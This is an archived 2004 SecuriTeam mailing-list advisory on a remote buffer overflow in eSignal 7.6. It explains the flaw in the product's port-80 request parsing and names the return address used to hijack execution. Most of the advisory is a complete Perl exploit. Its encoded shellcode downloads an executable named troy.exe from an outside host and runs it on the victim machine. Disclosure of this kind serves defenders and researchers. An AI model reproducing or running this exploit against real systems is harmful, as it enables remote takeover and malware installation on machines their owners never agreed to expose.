[NT] eSignal Remote Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 03/30/04
- Previous message: SecuriTeam: "[NT] Dark Age of Camelot Man-In-The-Middle"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 30 Mar 2004 13:07:22 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
eSignal Remote Buffer Overflow
------------------------------------------------------------------------
SUMMARY
" <http://www.esignal.com> eSignal is the nation's leading provider of
real-time financial and market information. eSignal is a popular platform
for institutional and professional traders. eSignal is a market data
solution bundled for best value for small to mid-size institutional
investors that also includes additional optional services."
A remote buffer overflow condition exists in eSignal due to invalid bounds
checking when receiving requests.
DETAILS
Vulnerable Systems:
* eSignal version 7.6 and prior
The main application WinSig.exe is listening for incoming data on TCP port
80. However, when parsing the incoming requests it suffers from a classic
buffer overflow condition when the parameter string exceeds about 1040
characters. A proof-of-concept:
<STREAMQUOTE>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....... x 1040
</STREAMQUOTE>
The overflow occurs in Specs.dll and the instruction pointer (EIP) is
totally under our control. There can be no NULL character in the crafted
payload and all lower-case characters are converted to upper case. Since
the MFC71.dll file contains the "jmp esp" instruction it is trivial to
overflow the application and direct the code to the payload.
Exploit:</B.
An exploit code in Perl for the buffer overflow is presented below:
#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*=
http://viziblesoft.com/insect
#
# 25-mAR-2004
#
use IO::Socket;
sub usage
{
die("\nUsage: perl $0 host port\n");
}
print "\r\neSignal v7.6 remote exploit, (c) VizibleSoft.com\r\n";
my $ip = $ARGV[0] || usage();
my $port = $ARGV[1] || usage();
my $data = "";
my $ret = "\xf3\x7b\x20\x7c"; # MFC71.dll "jmp esp"
my $nop = "\x90";
#
# Used api..
#
$api = "\x00wininet.dll\x00InternetOpenA\x00".
"InternetOpenUrlA\x00InternetReadFile\x00kernel32.dll\x00".
"_lcreat\x00_lwrite\x00_lclose\x00";
#
# Url of file to execute
#
$url = "http://viziblesoft.com/insect/sploits/troy.exe";
#
#
# Filename for our file on remote system
$fname = "setup.exe";
#
#
# Shellcode: downloads and executes file at URL
#
$shellc = "\x90".
"\x8B\xEC\x03\xEA\xB8\xEA\xFE\xFF\xFF\xF7\xD0\x03\xE8\x83\xC5\x0B\x8B\xFD\x4F\xF7".
"\x17\x83\xC7\x04\x83\x3F\xFF\x7C\xF6\xF7\x17\xB8\x5C\x12\x14\x7C\x8B\x18\x55\xFF".
"\xD3\x8B\xF8\x33\xC9\xB1\x03\x8D\x55\x0C\xB8\x58\x12\x14\x7C\x8B\x18\x51\x52\x52".
"\x57\xFF\xD3\x5A\x59\x89\x02\x83\xC2\x03\x42\x8A\x02\x3A\xC5\x7F\xF9\x42\xFE\xC9".
"\x3A\xCD\x7F\xDE\xB8\x5C\x12\x14\x7C\x8B\x18\x8D\x55\x3C\x52\xFF\xD3\x8B\xF8\xB8".
"\x58\x12\x14\x7C\x8B\x18\x53\x8D\x55\x49\x52\x52\x57\xFF\xD3\x5A\x89\x02\x8B\x1C".
"\x24\x8D\x55\x51\x52\x52\x57\xFF\xD3\x5A\x89\x02\x5B\x8D\x55\x59\x52\x52\x57\xFF".
"\xD3\x5A\x89\x02\x33\xD2\x52\x52\x52\x52\x55\xFF\x55\x0C\x33\xD2\x52\xB6\x80\xC1".
"\xE2\x10\x52\x33\xD2\x52\x52\x8D\x4D\x60\x41\x51\x50\xFF\x55\x1A\x89\x45\x1A\x33".
"\xD2\x52\x8D\x55\xF6\x52\xFF\x55\x49\x89\x45\x49\x33\xD2\xB6\x02\x2B\xE2\x83\xEC".
"\x04\x33\xD2\xB6\x02\x54\x8B\xC4\x83\xC0\x08\x52\x50\x8B\x45\x1A\x50\xFF\x55\x2B".
"\x8B\x04\x24\x8D\x54\x24\x04\x50\x52\x8B\x45\x49\x50\xFF\x55\x51\x83\x3C\x24\x01".
"\x7D\xD7\x8B\x45\x49\x50\xFF\x55\x59\x8D\x55\xF6\x52\xB8\x3F\x0E\x81\xF8\x35\x80".
"\x80\x80\x80\xFF\xD0\xB8\xD3\xFC\x80\xF8\x35\x80\x80\x80\x80\xFF\xE0$fname";
$movsb =
"\x90\x33\xc9\xb5\x02\xb1\xcc\x8b\xf4\x2b\xf1\x8b\xfc\x33\xd2\xb2\x15\x03\xfa\xf3\xa4";
#
# xor data block
#
$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
$data = $data . (substr($url, $i, 1) ^ "\xff");
};
$data .= "\xff\xff\xfe\xfe\xff\xff\xff\xff";
#
# construct overflow string...
#
$shellc .= $data;
$shellc .= ("\xcc" x (712 - length($shellc)));
$shellcode = $nop x (8 * 16) .
$shellc .
$ret .
$movsb .
$nop x (191-16);
# print "shellcode len: " . length($shellcode) . "\r\n";
$data = '<STREAMQUOTE>' . $shellcode . '</STREAMQUOTE>';
# print "sending data of len: " . length($data) . "\n";
print sendraw($data);
print "[+] Overflow sent / file executed!\n";
exit;
sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("[-] inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("[-] Socket
problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("[-] Can't connect...\n"); }}
The exploit can also be found at
<http://viziblesoft.com/insect/sploits/vz-eSignal76.pl>
http://viziblesoft.com/insect/sploits/vz-eSignal76.pl.
ADDITIONAL INFORMATION
The information has been provided by <mailto:vizzy@freemail.hu> Vizzy.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Dark Age of Camelot Man-In-The-Middle"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
